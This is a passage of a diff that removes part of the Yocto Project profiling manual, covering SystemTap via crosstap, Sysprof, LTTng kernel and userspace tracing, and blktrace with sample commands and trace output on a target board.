-                <ulink url='https://wiki.yoctoproject.org/wiki/Tracing_and_Profiling#systemtap'></ulink>.
-                Also, the ability to ssh into the target system is not enabled
-                by default in *-minimal images.
-            </note>
-            <literallayout class='monospaced'>
-     $ crosstap root@192.168.1.88 trace_open.stp
-
-     Error: No target kernel build found.
-     Did you forget to create a local build of your image?
-
-     'crosstap' requires a local sdk build of the target system
-     (or a build that includes 'tools-profile') in order to build
-     kernel modules that can probe the target system.
-
-     Practically speaking, that means you need to do the following:
-      - If you're running a pre-built image, download the release
-        and/or BSP tarballs used to build the image.
-      - If you're working from git sources, just clone the metadata
-        and BSP layers needed to build the image you'll be booting.
-      - Make sure you're properly set up to build a new image (see
-        the BSP README and/or the widely available basic documentation
-        that discusses how to build images).
-      - Build an -sdk version of the image e.g.:
-          $ bitbake core-image-sato-sdk
-      OR
-      - Build a non-sdk image but include the profiling tools:
-          [ edit local.conf and add 'tools-profile' to the end of
-            the EXTRA_IMAGE_FEATURES variable ]
-          $ bitbake core-image-sato
-
-     Once you've build the image on the host system, you're ready to
-     boot it (or the equivalent pre-built image) and use 'crosstap'
-     to probe it (you need to source the environment as usual first):
-
-        $ source oe-init-build-env
-        $ cd ~/my/systemtap/scripts
-        $ crosstap root@192.168.1.xxx myscript.stp
-            </literallayout>
-            So essentially what you need to do is build an SDK image or
-            image with 'tools-profile' as detailed in the
-            "<link linkend='profile-manual-general-setup'>General Setup</link>"
-            section of this manual, and boot the resulting target image.
-        </para>
-
-        <note>
-            If you have a build directory containing multiple machines,
-            you need to have the MACHINE you're connecting to selected
-            in local.conf, and the kernel in that machine's build
-            directory must match the kernel on the booted system exactly,
-            or you'll get the above 'crosstap' message when you try to
-            invoke a script.
-        </note>
-    </section>
-
-    <section id='running-a-script-on-a-target'>
-        <title>Running a Script on a Target</title>
-
-        <para>
-            Once you've done that, you should be able to run a systemtap
-            script on the target:
-            <literallayout class='monospaced'>
-     $ cd /path/to/yocto
-     $ source oe-init-build-env
-
-     ### Shell environment set up for builds. ###
-
-     You can now run 'bitbake &lt;target&gt;'
-
-     Common targets are:
-              core-image-minimal
-              core-image-sato
-              meta-toolchain
-              meta-ide-support
-
-     You can also run generated qemu images with a command like 'runqemu qemux86-64'
-
-            </literallayout>
-            Once you've done that, you can cd to whatever directory
-            contains your scripts and use 'crosstap' to run the script:
-            <literallayout class='monospaced'>
-     $ cd /path/to/my/systemap/script
-     $ crosstap root@192.168.7.2 trace_open.stp
-            </literallayout>
-            If you get an error connecting to the target e.g.:
-            <literallayout class='monospaced'>
-     $ crosstap root@192.168.7.2 trace_open.stp
-     error establishing ssh connection on remote 'root@192.168.7.2'
-            </literallayout>
-            Try ssh'ing to the target and see what happens:
-            <literallayout class='monospaced'>
-     $ ssh root@192.168.7.2
-            </literallayout>
-            A lot of the time, connection problems are due specifying a
-            wrong IP address or having a 'host key verification error'.
-        </para>
-
-        <para>
-            If everything worked as planned, you should see something
-            like this (enter the password when prompted, or press enter
-            if it's set up to use no password):
-            <literallayout class='monospaced'>
-     $ crosstap root@192.168.7.2 trace_open.stp
-     root@192.168.7.2's password:
-     matchbox-termin(1036) open ("/tmp/vte3FS2LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
-     matchbox-termin(1036) open ("/tmp/vteJMC7LW", O_RDWR|O_CREAT|O_EXCL|O_LARGEFILE, 0600)
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='systemtap-documentation'>
-        <title>Documentation</title>
-
-        <para>
-            The SystemTap language reference can be found here:
-            <ulink url='http://sourceware.org/systemtap/langref/'>SystemTap Language Reference</ulink>
-        </para>
-
-        <para>
-            Links to other SystemTap documents, tutorials, and examples can be
-            found here:
-            <ulink url='http://sourceware.org/systemtap/documentation.html'>SystemTap documentation page</ulink>
-        </para>
-    </section>
-</section>
-
-<section id='profile-manual-sysprof'>
-    <title>Sysprof</title>
-
-    <para>
-        Sysprof is a very easy to use system-wide profiler that consists
-        of a single window with three panes and a few buttons which allow
-        you to start, stop, and view the profile from one place.
-    </para>
-
-    <section id='sysprof-setup'>
-        <title>Setup</title>
-
-        <para>
-            For this section, we'll assume you've already performed the
-            basic setup outlined in the General Setup section.
-        </para>
-
-        <para>
-            Sysprof is a GUI-based application that runs on the target
-            system. For the rest of this document we assume you've
-            ssh'ed to the host and will be running Sysprof on the
-            target (you can use the '-X' option to ssh and have the
-            Sysprof GUI run on the target but display remotely on the
-            host if you want).
-        </para>
-    </section>
-
-    <section id='sysprof-basic-usage'>
-        <title>Basic Usage</title>
-
-        <para>
-            To start profiling the system, you simply press the 'Start'
-            button. To stop profiling and to start viewing the profile data
-            in one easy step, press the 'Profile' button.
-        </para>
-
-        <para>
-            Once you've pressed the profile button, the three panes will
-            fill up with profiling data:
-        </para>
-
-        <para>
-            <imagedata fileref="figures/sysprof-copy-to-user.png" width="6in" depth="4in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            The left pane shows a list of functions and processes.
-            Selecting one of those expands that function in the right
-            pane, showing all its callees. Note that this caller-oriented
-            display is essentially the inverse of perf's default
-            callee-oriented callchain display.
-        </para>
-
-        <para>
-            In the screenshot above, we're focusing on __copy_to_user_ll()
-            and looking up the callchain we can see that one of the callers
-            of __copy_to_user_ll is sys_read() and the complete callpath
-            between them. Notice that this is essentially a portion of the
-            same information we saw in the perf display shown in the perf
-            section of this page.
-        </para>
-
-        <para>
-            <imagedata fileref="figures/sysprof-copy-from-user.png" width="6in" depth="4in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            Similarly, the above is a snapshot of the Sysprof display of a
-            copy-from-user callchain.
-        </para>
-
-        <para>
-            Finally, looking at the third Sysprof pane in the lower left,
-            we can see a list of all the callers of a particular function
-            selected in the top left pane. In this case, the lower pane is
-            showing all the callers of __mark_inode_dirty:
-        </para>
-
-        <para>
-            <imagedata fileref="figures/sysprof-callers.png" width="6in" depth="4in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            Double-clicking on one of those functions will in turn change the
-            focus to the selected function, and so on.
-        </para>
-
-        <informalexample>
-            <emphasis>Tying it Together:</emphasis> If you like sysprof's 'caller-oriented'
-            display, you may be able to approximate it in other tools as
-            well.  For example, 'perf report' has the -g (--call-graph)
-            option that you can experiment with; one of the options is
-            'caller' for an inverted caller-based callgraph display.
-        </informalexample>
-    </section>
-
-    <section id='sysprof-documentation'>
-        <title>Documentation</title>
-
-        <para>
-            There doesn't seem to be any documentation for Sysprof, but
-            maybe that's because it's pretty self-explanatory.
-            The Sysprof website, however, is here:
-            <ulink url='http://sysprof.com/'>Sysprof, System-wide Performance Profiler for Linux</ulink>
-        </para>
-    </section>
-</section>
-
-<section id='lttng-linux-trace-toolkit-next-generation'>
-    <title>LTTng (Linux Trace Toolkit, next generation)</title>
-
-    <section id='lttng-setup'>
-        <title>Setup</title>
-
-        <para>
-            For this section, we'll assume you've already performed the
-            basic setup outlined in the General Setup section.
-            LTTng is run on the target system by ssh'ing to it.
-        </para>
-    </section>
-
-    <section id='collecting-and-viewing-traces'>
-        <title>Collecting and Viewing Traces</title>
-
-        <para>
-            Once you've applied the above commits and built and booted your
-            image (you need to build the core-image-sato-sdk image or use one of the
-            other methods described in the General Setup section), you're
-            ready to start tracing.
-        </para>
-
-        <section id='collecting-and-viewing-a-trace-on-the-target-inside-a-shell'>
-            <title>Collecting and viewing a trace on the target (inside a shell)</title>
-
-            <para>
-                First, from the host, ssh to the target:
-                <literallayout class='monospaced'>
-     $ ssh -l root 192.168.1.47
-     The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
-     RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
-     Are you sure you want to continue connecting (yes/no)? yes
-     Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
-     root@192.168.1.47's password:
-                </literallayout>
-                Once on the target, use these steps to create a trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng create
-     Spawning a session daemon
-     Session auto-20121015-232120 created.
-     Traces will be written in /home/root/lttng-traces/auto-20121015-232120
-                </literallayout>
-                Enable the events you want to trace (in this case all
-                kernel events):
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng enable-event --kernel --all
-     All kernel events are enabled in channel channel0
-                </literallayout>
-                Start the trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng start
-     Tracing started for session auto-20121015-232120
-                </literallayout>
-                And then stop the trace after awhile or after running
-                a particular workload that you want to trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng stop
-     Tracing stopped for session auto-20121015-232120
-                </literallayout>
-                You can now view the trace in text form on the target:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng view
-     [23:21:56.989270399] (+?.?????????) sys_geteuid: { 1 }, { }
-     [23:21:56.989278081] (+0.000007682) exit_syscall: { 1 }, { ret = 0 }
-     [23:21:56.989286043] (+0.000007962) sys_pipe: { 1 }, { fildes = 0xB77B9E8C }
-     [23:21:56.989321802] (+0.000035759) exit_syscall: { 1 }, { ret = 0 }
-     [23:21:56.989329345] (+0.000007543) sys_mmap_pgoff: { 1 }, { addr = 0x0, len = 10485760, prot = 3, flags = 131362, fd = 4294967295, pgoff = 0 }
-     [23:21:56.989351694] (+0.000022349) exit_syscall: { 1 }, { ret = -1247805440 }
-     [23:21:56.989432989] (+0.000081295) sys_clone: { 1 }, { clone_flags = 0x411, newsp = 0xB5EFFFE4, parent_tid = 0xFFFFFFFF, child_tid = 0x0 }
-     [23:21:56.989477129] (+0.000044140) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 681660, vruntime = 43367983388 }
-     [23:21:56.989486697] (+0.000009568) sched_migrate_task: { 1 }, { comm = "lttng-consumerd", tid = 1193, prio = 20, orig_cpu = 1, dest_cpu = 1 }
-     [23:21:56.989508418] (+0.000021721) hrtimer_init: { 1 }, { hrtimer = 3970832076, clockid = 1, mode = 1 }
-     [23:21:56.989770462] (+0.000262044) hrtimer_cancel: { 1 }, { hrtimer = 3993865440 }
-     [23:21:56.989771580] (+0.000001118) hrtimer_cancel: { 0 }, { hrtimer = 3993812192 }
-     [23:21:56.989776957] (+0.000005377) hrtimer_expire_entry: { 1 }, { hrtimer = 3993865440, now = 79815980007057, function = 3238465232 }
-     [23:21:56.989778145] (+0.000001188) hrtimer_expire_entry: { 0 }, { hrtimer = 3993812192, now = 79815980008174, function = 3238465232 }
-     [23:21:56.989791695] (+0.000013550) softirq_raise: { 1 }, { vec = 1 }
-     [23:21:56.989795396] (+0.000003701) softirq_raise: { 0 }, { vec = 1 }
-     [23:21:56.989800635] (+0.000005239) softirq_raise: { 0 }, { vec = 9 }
-     [23:21:56.989807130] (+0.000006495) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 330710, vruntime = 43368314098 }
-     [23:21:56.989809993] (+0.000002863) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 1015313, vruntime = 36976733240 }
-     [23:21:56.989818514] (+0.000008521) hrtimer_expire_exit: { 0 }, { hrtimer = 3993812192 }
-     [23:21:56.989819631] (+0.000001117) hrtimer_expire_exit: { 1 }, { hrtimer = 3993865440 }
-     [23:21:56.989821866] (+0.000002235) hrtimer_start: { 0 }, { hrtimer = 3993812192, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
-     [23:21:56.989822984] (+0.000001118) hrtimer_start: { 1 }, { hrtimer = 3993865440, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
-     [23:21:56.989832762] (+0.000009778) softirq_entry: { 1 }, { vec = 1 }
-     [23:21:56.989833879] (+0.000001117) softirq_entry: { 0 }, { vec = 1 }
-     [23:21:56.989838069] (+0.000004190) timer_cancel: { 1 }, { timer = 3993871956 }
-     [23:21:56.989839187] (+0.000001118) timer_cancel: { 0 }, { timer = 3993818708 }
-     [23:21:56.989841492] (+0.000002305) timer_expire_entry: { 1 }, { timer = 3993871956, now = 79515980, function = 3238277552 }
-     [23:21:56.989842819] (+0.000001327) timer_expire_entry: { 0 }, { timer = 3993818708, now = 79515980, function = 3238277552 }
-     [23:21:56.989854831] (+0.000012012) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 49237, vruntime = 43368363335 }
-     [23:21:56.989855949] (+0.000001118) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 45121, vruntime = 36976778361 }
-     [23:21:56.989861257] (+0.000005308) sched_stat_sleep: { 1 }, { comm = "kworker/1:1", tid = 21, delay = 9451318 }
-     [23:21:56.989862374] (+0.000001117) sched_stat_sleep: { 0 }, { comm = "kworker/0:0", tid = 4, delay = 9958820 }
-     [23:21:56.989868241] (+0.000005867) sched_wakeup: { 0 }, { comm = "kworker/0:0", tid = 4, prio = 120, success = 1, target_cpu = 0 }
-     [23:21:56.989869358] (+0.000001117) sched_wakeup: { 1 }, { comm = "kworker/1:1", tid = 21, prio = 120, success = 1, target_cpu = 1 }
-     [23:21:56.989877460] (+0.000008102) timer_expire_exit: { 1 }, { timer = 3993871956 }
-     [23:21:56.989878577] (+0.000001117) timer_expire_exit: { 0 }, { timer = 3993818708 }
-     .
-     .
-     .
-                </literallayout>
-                You can now safely destroy the trace session (note that
-                this doesn't delete the trace - it's still there
-                in ~/lttng-traces):
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng destroy
-     Session auto-20121015-232120 destroyed at /home/root
-                </literallayout>
-                Note that the trace is saved in a directory of the same
-                name as returned by 'lttng create', under the ~/lttng-traces
-                directory (note that you can change this by supplying your
-                own name to 'lttng create'):
-                <literallayout class='monospaced'>
-     root@crownbay:~# ls -al ~/lttng-traces
-     drwxrwx---    3 root     root          1024 Oct 15 23:21 .
-     drwxr-xr-x    5 root     root          1024 Oct 15 23:57 ..
-     drwxrwx---    3 root     root          1024 Oct 15 23:21 auto-20121015-232120
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='collecting-and-viewing-a-userspace-trace-on-the-target-inside-a-shell'>
-            <title>Collecting and viewing a userspace trace on the target (inside a shell)</title>
-
-            <para>
-                For LTTng userspace tracing, you need to have a properly
-                instrumented userspace program. For this example, we'll use
-                the 'hello' test program generated by the lttng-ust build.
-            </para>
-
-            <para>
-                The 'hello' test program isn't installed on the rootfs by
-                the lttng-ust build, so we need to copy it over manually.
-                First cd into the build directory that contains the hello
-                executable:
-                <literallayout class='monospaced'>
-     $ cd build/tmp/work/core2_32-poky-linux/lttng-ust/2.0.5-r0/git/tests/hello/.libs
-                </literallayout>
-                Copy that over to the target machine:
-                <literallayout class='monospaced'>
-     $ scp hello root@192.168.1.20:
-                </literallayout>
-                You now have the instrumented lttng 'hello world' test
-                program on the target, ready to test.
-            </para>
-
-            <para>
-                First, from the host, ssh to the target:
-                <literallayout class='monospaced'>
-     $ ssh -l root 192.168.1.47
-     The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
-     RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
-     Are you sure you want to continue connecting (yes/no)? yes
-     Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
-     root@192.168.1.47's password:
-                </literallayout>
-                Once on the target, use these steps to create a trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng create
-     Session auto-20190303-021943 created.
-     Traces will be written in /home/root/lttng-traces/auto-20190303-021943
-                </literallayout>
-                Enable the events you want to trace (in this case all
-                userspace events):
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng enable-event --userspace --all
-     All UST events are enabled in channel channel0
-                </literallayout>
-                Start the trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng start
-     Tracing started for session auto-20190303-021943
-                </literallayout>
-                Run the instrumented hello world program:
-                <literallayout class='monospaced'>
-     root@crownbay:~# ./hello
-     Hello, World!
-     Tracing...  done.
-                </literallayout>
-                And then stop the trace after awhile or after running a
-                particular workload that you want to trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng stop
-     Tracing stopped for session auto-20190303-021943
-                </literallayout>
-                You can now view the trace in text form on the target:
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng view
-     [02:31:14.906146544] (+?.?????????) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 0, intfield2 = 0x0, longfield = 0, netintfield = 0, netintfieldhex = 0x0, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4,  seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
-     [02:31:14.906170360] (+0.000023816) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 1, intfield2 = 0x1, longfield = 1, netintfield = 1, netintfieldhex = 0x1, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
-     [02:31:14.906183140] (+0.000012780) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 2, intfield2 = 0x2, longfield = 2, netintfield = 2, netintfieldhex = 0x2, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
-     [02:31:14.906194385] (+0.000011245) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 3, intfield2 = 0x3, longfield = 3, netintfield = 3, netintfieldhex = 0x3, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
-     .
-     .
-     .
-                </literallayout>
-                You can now safely destroy the trace session (note that
-                this doesn't delete the trace - it's still
-                there in ~/lttng-traces):
-                <literallayout class='monospaced'>
-     root@crownbay:~# lttng destroy
-     Session auto-20190303-021943 destroyed at /home/root
-                </literallayout>
-            </para>
-        </section>
-
-    </section>
-
-    <section id='lltng-documentation'>
-        <title>Documentation</title>
-
-        <para>
-            You can find the primary LTTng Documentation on the
-            <ulink url='https://lttng.org/docs/'>LTTng Documentation</ulink>
-            site.
-            The documentation on this site is appropriate for intermediate to
-            advanced software developers who are working in a Linux environment
-            and are interested in efficient software tracing.
-        </para>
-
-        <para>
-            For information on LTTng in general, visit the
-            <ulink url='http://lttng.org/lttng2.0'>LTTng Project</ulink>
-            site.
-            You can find a "Getting Started" link on this site that takes
-            you to an LTTng Quick Start.
-        </para>
-    </section>
-</section>
-
-<section id='profile-manual-blktrace'>
-    <title>blktrace</title>
-
-    <para>
-        blktrace is a tool for tracing and reporting low-level disk I/O.
-        blktrace provides the tracing half of the equation; its output can
-        be piped into the blkparse program, which renders the data in a
-        human-readable form and does some basic analysis:
-    </para>
-
-    <section id='blktrace-setup'>
-        <title>Setup</title>
-
-        <para>
-            For this section, we'll assume you've already performed the
-            basic setup outlined in the
-            "<link linkend='profile-manual-general-setup'>General Setup</link>"
-            section.
-        </para>
-
-        <para>
-            blktrace is an application that runs on the target system.
-            You can run the entire blktrace and blkparse pipeline on the
-            target, or you can run blktrace in 'listen' mode on the target
-            and have blktrace and blkparse collect and analyze the data on
-            the host (see the
-            "<link linkend='using-blktrace-remotely'>Using blktrace Remotely</link>"
-            section below).
-            For the rest of this section we assume you've ssh'ed to the
-            host and will be running blkrace on the target.
-        </para>
-    </section>
-
-    <section id='blktrace-basic-usage'>
-        <title>Basic Usage</title>
-
-        <para>
-            To record a trace, simply run the 'blktrace' command, giving it
-            the name of the block device you want to trace activity on:
-            <literallayout class='monospaced'>
-     root@crownbay:~# blktrace /dev/sdc
-            </literallayout>
-            In another shell, execute a workload you want to trace.
-            <literallayout class='monospaced'>
-     root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>; sync
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |*******************************| 41727k  0:00:00 ETA
-            </literallayout>
-            Press Ctrl-C in the blktrace shell to stop the trace. It will
-            display how many events were logged, along with the per-cpu file
-            sizes (blktrace records traces in per-cpu kernel buffers and
-            simply dumps them to userspace for blkparse to merge and sort
-            later).
-            <literallayout class='monospaced'>
-     ^C=== sdc ===
-      CPU  0:                 7082 events,      332 KiB data
-      CPU  1:                 1578 events,       74 KiB data
-      Total:                  8660 events (dropped 0),      406 KiB data
-            </literallayout>
-            If you examine the files saved to disk, you see multiple files,
-            one per CPU and with the device name as the first part of the
-            filename:
-            <literallayout class='monospaced'>
-     root@crownbay:~# ls -al
-     drwxr-xr-x    6 root     root          1024 Oct 27 22:39 .
-     drwxr-sr-x    4 root     root          1024 Oct 26 18:24 ..
-     -rw-r--r--    1 root     root        339938 Oct 27 22:40 sdc.blktrace.0
-     -rw-r--r--    1 root     root         75753 Oct 27 22:40 sdc.blktrace.1
-            </literallayout>
-            To view the trace events, simply invoke 'blkparse' in the
-            directory containing the trace files, giving it the device name
-            that forms the first part of the filenames:
-            <literallayout class='monospaced'>
-     root@crownbay:~# blkparse sdc
-
-      8,32   1        1     0.000000000  1225  Q  WS 3417048 + 8 [jbd2/sdc-8]
-      8,32   1        2     0.000025213  1225  G  WS 3417048 + 8 [jbd2/sdc-8]
-      8,32   1        3     0.000033384  1225  P   N [jbd2/sdc-8]
-      8,32   1        4     0.000043301  1225  I  WS 3417048 + 8 [jbd2/sdc-8]
-      8,32   1        0     0.000057270     0  m   N cfq1225 insert_request
-      8,32   1        0     0.000064813     0  m   N cfq1225 add_to_rr
-      8,32   1        5     0.000076336  1225  U   N [jbd2/sdc-8] 1
-      8,32   1        0     0.000088559     0  m   N cfq workload slice:150
-      8,32   1        0     0.000097359     0  m   N cfq1225 set_active wl_prio:0 wl_type:1
-      8,32   1        0     0.000104063     0  m   N cfq1225 Not idling. st->count:1
-      8,32   1        0     0.000112584     0  m   N cfq1225 fifo=  (null)
-      8,32   1        0     0.000118730     0  m   N cfq1225 dispatch_insert
-      8,32   1        0     0.000127390     0  m   N cfq1225 dispatched a request
-      8,32   1        0     0.000133536     0  m   N cfq1225 activate rq, drv=1
-      8,32   1        6     0.000136889  1225  D  WS 3417048 + 8 [jbd2/sdc-8]
-      8,32   1        7     0.000360381  1225  Q  WS 3417056 + 8 [jbd2/sdc-8]
-      8,32   1        8     0.000377422  1225  G  WS 3417056 + 8 [jbd2/sdc-8]
-      8,32   1        9     0.000388876  1225  P   N [jbd2/sdc-8]
-      8,32   1       10     0.000397886  1225  Q  WS 3417064 + 8 [jbd2/sdc-8]
-      8,32   1       11     0.000404800  1225  M  WS 3417064 + 8 [jbd2/sdc-8]
-      8,32   1       12     0.000412343  1225  Q  WS 3417072 + 8 [jbd2/sdc-8]
-      8,32   1       13     0.000416533  1225  M  WS 3417072 + 8 [jbd2/sdc-8]
-      8,32   1       14     0.000422121  1225  Q  WS 3417080 + 8 [jbd2/sdc-8]
-      8,32   1       15     0.000425194  1225  M  WS 3417080 + 8 [jbd2/sdc-8]
-      8,32   1       16     0.000431968  1225  Q  WS 3417088 + 8 [jbd2/sdc-8]
-      8,32   1       17     0.000435251  1225  M  WS 3417088 + 8 [jbd2/sdc-8]
-      8,32   1       18     0.000440279  1225  Q  WS 3417096 + 8 [jbd2/sdc-8]
-      8,32   1       19     0.000443911  1225  M  WS 3417096 + 8 [jbd2/sdc-8]
-      8,32   1       20     0.000450336  1225  Q  WS 3417104 + 8 [jbd2/sdc-8]
-      8,32   1       21     0.000454038  1225  M  WS 3417104 + 8 [jbd2/sdc-8]
-      8,32   1       22     0.000462070  1225  Q  WS 3417112 + 8 [jbd2/sdc-8]
-      8,32   1       23     0.000465422  1225  M  WS 3417112 + 8 [jbd2/sdc-8]
-      8,32   1       24     0.000474222  1225  I  WS 3417056 + 64 [jbd2/sdc-8]
-      8,32   1        0     0.000483022     0  m   N cfq1225 insert_request
-      8,32   1       25     0.000489727  1225  U   N [jbd2/sdc-8] 1
-      8,32   1        0     0.000498457     0  m   N cfq1225 Not idling. st->count:1
-      8,32   1        0     0.000503765     0  m   N cfq1225 dispatch_insert
-      8,32   1        0     0.000512914     0  m   N cfq1225 dispatched a request
-      8,32   1        0     0.000518851     0  m   N cfq1225 activate rq, drv=2
-      .
-      .
-      .
-      8,32   0        0    58.515006138     0  m   N cfq3551 complete rqnoidle 1
-      8,32   0     2024    58.516603269     3  C  WS 3156992 + 16 [0]
-      8,32   0        0    58.516626736     0  m   N cfq3551 complete rqnoidle 1
-      8,32   0        0    58.516634558     0  m   N cfq3551 arm_idle: 8 group_idle: 0
-      8,32   0        0    58.516636933     0  m   N cfq schedule dispatch
-      8,32   1        0    58.516971613     0  m   N cfq3551 slice expired t=0
-      8,32   1        0    58.516982089     0  m   N cfq3551 sl_used=13 disp=6 charge=13 iops=0 sect=80
-      8,32   1        0    58.516985511     0  m   N cfq3551 del_from_rr
-      8,32   1        0    58.516990819     0  m   N cfq3551 put_queue
-
-     CPU0 (sdc):
-      Reads Queued:           0,        0KiB	 Writes Queued:         331,   26,284KiB
-      Read Dispatches:        0,        0KiB	 Write Dispatches:      485,   40,484KiB
-      Reads Requeued:         0		 Writes Requeued:         0
-      Reads Completed:        0,        0KiB	 Writes Completed:      511,   41,000KiB
-      Read Merges:            0,        0KiB	 Write Merges:           13,      160KiB
-      Read depth:             0        	 Write depth:             2
-      IO unplugs:            23        	 Timer unplugs:           0
-     CPU1 (sdc):
-      Reads Queued:           0,        0KiB	 Writes Queued:         249,   15,800KiB
-      Read Dispatches:        0,        0KiB	 Write Dispatches:       42,    1,600KiB
-      Reads Requeued:         0		 Writes Requeued:         0
-      Reads Completed:        0,        0KiB	 Writes Completed:       16,    1,084KiB
-      Read Merges:            0,        0KiB	 Write Merges:           40,      276KiB
-      Read depth:             0        	 Write depth:             2
-      IO unplugs:            30        	 Timer unplugs:           1
-
-     Total (sdc):
-      Reads Queued:           0,        0KiB	 Writes Queued:         580,   42,084KiB
-      Read Dispatches:        0,        0KiB	 Write Dispatches:      527,   42,084KiB
-      Reads Requeued:         0		 Writes Requeued:         0
-      Reads Completed:        0,        0KiB	 Writes Completed:      527,   42,084KiB
-      Read Merges:            0,        0KiB	 Write Merges:           53,      436KiB
-      IO unplugs:            53        	 Timer unplugs:           1
-
-     Throughput (R/W): 0KiB/s / 719KiB/s
-     Events (sdc): 6,592 entries
-     Skips: 0 forward (0 -   0.0%)
-     Input file sdc.blktrace.0 added
-     Input file sdc.blktrace.1 added
-            </literallayout>
-            The report shows each event that was found in the blktrace data,
-            along with a summary of the overall block I/O traffic during
-            the run. You can look at the
-            <ulink url='http://linux.die.net/man/1/blkparse'>blkparse</ulink>
-            manpage to learn the
-            meaning of each field displayed in the trace listing.
-        </para>
-
-        <section id='blktrace-live-mode'>
-            <title>Live Mode</title>
-
-            <para>
-                blktrace and blkparse are designed from the ground up to
-                be able to operate together in a 'pipe mode' where the
-                stdout of blktrace can be fed directly into the stdin of
-                blkparse:
-                <literallayout class='monospaced'>
-     root@crownbay:~# blktrace /dev/sdc -o - | blkparse -i -
-                </literallayout>
-                This enables long-lived tracing sessions to run without
-                writing anything to disk, and allows the user to look for
-                certain conditions in the trace data in 'real-time' by
-                viewing the trace output as it scrolls by on the screen or
-                by passing it along to yet another program in the pipeline
-                such as grep which can be used to identify and capture
-                conditions of interest.
-            </para>
-
-            <para>
-                There's actually another blktrace command that implements
-                the above pipeline as a single command, so the user doesn't
-                have to bother typing in the above command sequence:
-                <literallayout class='monospaced'>
-     root@crownbay:~# btrace /dev/sdc
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='using-blktrace-remotely'>
-            <title>Using blktrace Remotely</title>
-
-            <para>
-                Because blktrace traces block I/O and at the same time
-                normally writes its trace data to a block device, and
-                in general because it's not really a great idea to make
-                the device being traced the same as the device the tracer
-                writes to, blktrace provides a way to trace without
-                perturbing the traced device at all by providing native
-                support for sending all trace data over the network.
-            </para>
-
-            <para>
-                To have blktrace operate in this mode, start blktrace on
-                the target system being traced with the -l option, along with
-                the device to trace:
-                <literallayout class='monospaced'>
-     root@crownbay:~# blktrace -l /dev/sdc
-     server: waiting for connections...
-                </literallayout>
-                On the host system, use the -h option to connect to the
-                target system, also passing it the device to trace:
-                <literallayout class='monospaced'>
-     $ blktrace -d /dev/sdc -h 192.168.1.43
-     blktrace: connecting to 192.168.1.43
-     blktrace: connected!
-                </literallayout>
-                On the target system, you should see this:
-                <literallayout class='monospaced'>
-     server: connection from 192.168.1.43
-                </literallayout>
-                In another shell, execute a workload you want to trace.
-                <literallayout class='monospaced'>
-     root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>; sync
-     Connecting to downloads.yoctoproject.org (140.211.169.59:80)
-     linux-2.6.19.2.tar.b 100% |*******************************| 41727k  0:00:00 ETA
-                </literallayout>
-                When it's done, do a Ctrl-C on the host system to
-                stop the trace:
